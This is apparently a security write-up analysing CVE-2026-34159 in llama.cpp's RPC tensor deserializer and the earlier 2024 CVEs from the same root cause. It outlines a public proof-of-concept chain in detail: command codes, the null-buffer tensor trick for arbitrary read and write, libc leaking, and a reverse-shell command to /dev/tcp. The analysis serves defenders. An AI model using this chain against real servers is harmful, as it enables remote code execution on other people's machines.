CVE-2026-34159: The Deserializer Three CVEs Have Not Patched

The 2024 fix is per-handler. The deserializer is not.

deserialize_tensor lives in ggml/src/ggml-rpc/ggml-rpc.cpp. It is the single deserialization point for tensors that arrive on the RPC server's TCP socket. Its job is to read a wire-format rpc_tensor (296 bytes, fixed layout) and produce a ggml_tensor that the rest of the server can compute over.

The wire format includes a 64-bit data pointer and a 64-bit buffer pointer. The buffer pointer is a handle the client received from a previous ALLOC_BUFFER reply; the server expects to recognize it. The data pointer names the address inside that buffer where the tensor's elements live. Both fields are honest most of the time. The threat model is the case where they are not.

The 2024 fix's structure inside deserialize_tensor, verbatim from current master:

result->buffer = reinterpret_cast<ggml_backend_buffer_t>(tensor->buffer);
if (result->buffer && buffers.find(result->buffer) == buffers.end()) {
    result->buffer = nullptr;
}

if (result->buffer) {
    // require that the tensor data does not go beyond the buffer end
    uint64_t tensor_size = (uint64_t) ggml_nbytes(result);
    uint64_t buffer_start = (uint64_t) ggml_backend_buffer_get_base(result->buffer);
    uint64_t buffer_size = (uint64_t) ggml_backend_buffer_get_size(result->buffer);
    GGML_ASSERT(tensor->data + tensor_size >= tensor->data);
    GGML_ASSERT(tensor->data >= buffer_start && tensor->data + tensor_size <= buffer_start + buffer_size);
}

result->op = (ggml_op) tensor->op;
...
result->data = reinterpret_cast<void *>(tensor->data);

Three behaviors. First: cast the wire's buffer field to a pointer. Second: if that pointer is non-null but is not in the server's buffers set, replace it with null. Third: only run the data-bounds check when result->buffer is set. The data field is then assigned unconditionally at the bottom of the function. A tensor with buffer=0 (a null cast from the wire) reaches the assignment with no bounds enforcement, carrying whatever 64-bit value the network put in tensor->data.

The 2024 patch's defensive layer was outside this function. From the GHSA's "Relation to prior CVEs" section, written by the reporter:

All three share the same underlying bug: deserialize_tensor() does not validate tensor->data when buffer=0. The 2024 patches added bounds checks in the GET_TENSOR and SET_TENSOR command handlers, but the GRAPH_COMPUTE command takes a separate code path (graph_compute() -> create_node() -> deserialize_tensor()) that was never patched.

The 2024 fix was per-handler. set_tensor got its own bounds check. get_tensor got its own. deserialize_tensor got the partial check that runs only when the buffer field is verifiable. create_node, the entry point for GRAPH_COMPUTE, got nothing. From August 2024 to March 2026, an attacker who sent a tensor with buffer=0 through GRAPH_COMPUTE was reaching code that had not been told the input might be hostile.

The wire format ships an arbitrary R/W primitive, and GRAPH_COMPUTE consumes it.

Hassan Ali's PoC at casp3r0x0/CVE-2026-34159 is a single Python script under 350 lines, targeting llama.cpp build b8487. It opens a TCP connection to the RPC port, sends RPC_CMD_HELLO (command code 14), and starts allocating buffers. Two RPC commands are needed before the primitive:

RPC_CMD_ALLOC_BUFFER     = 0
RPC_CMD_BUFFER_GET_BASE  = 3
RPC_CMD_SET_TENSOR       = 6
RPC_CMD_GET_TENSOR       = 8
RPC_CMD_GRAPH_COMPUTE    = 10

ALLOC_BUFFER returns a (remote_ptr, size) pair where remote_ptr is a server-side ggml_backend_buffer*. BUFFER_GET_BASE resolves that handle to the buffer's actual data region. After two commands the client has a handle the server recognizes, so future bounds checks against this buffer pass, and the absolute address of its data region, so the client can compute offsets inside it.

The exploit primitive is one GRAPH_COMPUTE graph with two tensors:

src = self._pack_tensor(0x3001, 0,          target_addr,  GGML_OP_NONE, [],       n_elems)
dst = self._pack_tensor(0x3002, remote_ptr, buffer_base,  GGML_OP_CPY,  [0x3001], n_elems, flags=16)

Source tensor: buffer = 0, data = target_addr. Inside deserialize_tensor, the buffer cast is null, the lookup branch is unreached, the bounds-check branch is skipped. The server returns a ggml_tensor whose data pointer is target_addr, the address the attacker named.

Destination tensor: buffer = remote_ptr (the handle from ALLOC_BUFFER, which IS in the server's buffers set), data = buffer_base (the real address of the buffer's data region). The buffer is recognized, the bounds check runs, the destination passes honestly.

create_node calls deserialize_tensor for both. Both return non-null. The pre-patch if (result == nullptr) accepts both. The graph is queued and executed. The CPY kernel performs memcpy(buffer_base, target_addr, n_bytes). The server has just read from any address the attacker named and copied the bytes into a buffer the attacker can pull back with GET_TENSOR.

That is an arbitrary read in two RPC commands. Reversing source and destination yields an arbitrary write. Both primitives bypass the bounds check because the source tensor has buffer=0 and the bounds check is conditional on the buffer field being verifiable.

The exploit chain after the primitives is conventional. The PoC reads the iface.get_base function pointer from the staging buffer's ggml_backend_buffer struct, scans backward in 4 KiB pages for the ELF magic to find libggml-base.so, reads the GOT slot for memcpy to leak libc, scans backward for libc's ELF magic, fetches libc's .note.gnu.build-id, queries libc.rip for system()'s offset by build-id, writes bash -c "bash -i>&/dev/tcp/<lhost>/<lport> 0>&1" and the resolved system() address into the staging buffer, and arbitrary-writes those 64 bytes over the staging buffer's own iface struct, replacing iface->clear with system(). Then the PoC sends RPC_CMD_BUFFER_CLEAR, which calls iface->clear(buf). The reverse shell connects back.

The seven phases of the chain are bookkeeping. The primitive is: the RPC server will perform a memcpy from any address to any address on the network's request, repeatedly.

The 2026 fix is at the call site. The deserializer is unchanged.

The patch in commit 39bf0d3 is three lines:

     struct ggml_tensor * result = deserialize_tensor(ctx, tensor);
-    if (result == nullptr) {
+    if (result == nullptr || result->buffer == nullptr) {
+        GGML_LOG_ERROR("[%s] invalid tensor: null %s (id=%" PRIu64 ")\n",
+                       __func__, result == nullptr ? "tensor" : "buffer", id);
         return nullptr;
     }

The change is in create_node, inside the GRAPH_COMPUTE handler. deserialize_tensor is not modified. The maintainer who merged it noted on the PR that "tensor views within the compute graph are initialized through ggml_backend_view_init(), which includes assertions that prevent null buffer pointers in valid tensors. This validation makes the additional check sufficiently protective."

The 2026 patch follows the 2024 patch's shape. Each patch closes the specific call site that the specific CVE reached. set_tensor got its own bounds check in 2024. get_tensor got its own in 2024. create_node got its null check in 2026. The function they all call still returns tensors with null buffers and attacker-controlled data pointers.

The reviewer's reasoning is correct for the existing handlers. The bounds checks in set_tensor and get_tensor validate tensor->data directly against the buffer the wire claims. The create_node null check rejects null-buffer tensors before they reach a kernel. Together they cover the four RPC commands that pass tensors to dangerous code: SET_TENSOR, GET_TENSOR, COPY_TENSOR, GRAPH_COMPUTE. Any future RPC command that calls deserialize_tensor and uses result->data will need its own equivalent guard at its own call site. The contract of deserialize_tensor is still: return a struct whose pointers may be whatever the network said.

Three CVEs reach the same deserializer.

CVE-2024-42478 (b3561, August 2024): "The unsafe data pointer member in the rpc_tensor structure can cause arbitrary address reading." Reached through GET_TENSOR. Patched by adding a bounds check in get_tensor.

CVE-2024-42479 (b3561, August 2024): "The unsafe data pointer member in the rpc_tensor structure can cause arbitrary address writing." Reached through SET_TENSOR. Patched by adding a bounds check in set_tensor.

CVE-2026-34159 (b8492, March 2026): "The RPC backend's deserialize_tensor() skips all bounds validation when a tensor's buffer field is 0." Reached through GRAPH_COMPUTE. Patched by adding a null-buffer check in create_node.

Three CVEs. Three fixes. Three different RPC handlers. One file. The deserialization function that produces the unsafe tensor in every path is the same in 2026 as it was before any of the three patches landed. From the reporter's own writeup of CVE-2026-34159, in the GHSA: "All three share the same underlying bug: deserialize_tensor() does not validate tensor->data when buffer=0."

This is what Design Debt Driver names. A component whose architecture produces the same bug class on a cadence, where each patch closes the specific instance and leaves the substrate intact. Tomcat's EncryptInterceptor shipped two CVEs from the same messageReceived method this season, the second introduced by the patch for the first. llama.cpp's RPC backend produces them by handler: every command that takes a tensor on the wire is its own opportunity for the wire's data pointer to escape. Closing the symptom in three handlers does not change the deserializer's contract. The next handler that calls deserialize_tensor and uses result->data without a local guard reproduces the primitive.

The closer kin is Unpatchable Primitive. The RPC backend's job is to deserialize attacker-controlled tensor structures from the network and execute compute graphs over them. The structures contain pointers; the compute graphs run memcpy. Removing the primitive cleanly would mean rejecting every tensor whose data field cannot be proven to lie inside a known buffer, regardless of which call site reached the deserializer. That is a refactor of deserialize_tensor, not a guard at one of its consumers. Two CVE cycles have ended without that refactor.

What the advisory says, and what NVD does not.

The GHSA includes a "Relation to prior CVEs" section that names CVE-2024-42478, CVE-2024-42479, and the architectural fact that the GRAPH_COMPUTE path was never patched. The reporter, GitHub user las7, wrote that section himself and filed via CERT/CC on February 8, 2026. The advisory text says the three CVEs share one root cause.

NVD's CVE-2026-34159 entry says the bug is missing bounds validation when buffer=0 and that the patch is in version b8492. It does not link to the 2024 CVEs. The CWE assigned is CWE-119, the same CWE assigned to CVE-2024-42478 and CVE-2024-42479. A defender reading NVD sees a single CVE with a buffer-validation bug. A defender reading the GHSA sees the third CVE in a class that the reporter has named.

The 2024 fix that produced the partial bounds check inside deserialize_tensor also moved the RPC server's default bind address from 0.0.0.0 to 127.0.0.1 and added a runtime warning when the operator binds elsewhere. The README warns, in 2026 as in 2024, that the RPC backend is "currently in a proof-of-concept development stage" and that exposing the port is "dangerous and should be avoided." The CVSS:3.1 vector on the new CVE is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H: network-reachable, low complexity, no privileges, no interaction. The README's framing assumes operators who read warnings. The CVSS framing assumes operators who deploy the feature anyway. The 2024 default-bind change addressed the first audience. The exploit chain works against the second.

PoC: casp3r0x0/CVE-2026-34159

Three CVEs reach the same deserializer. The three patches do not touch the deserializer.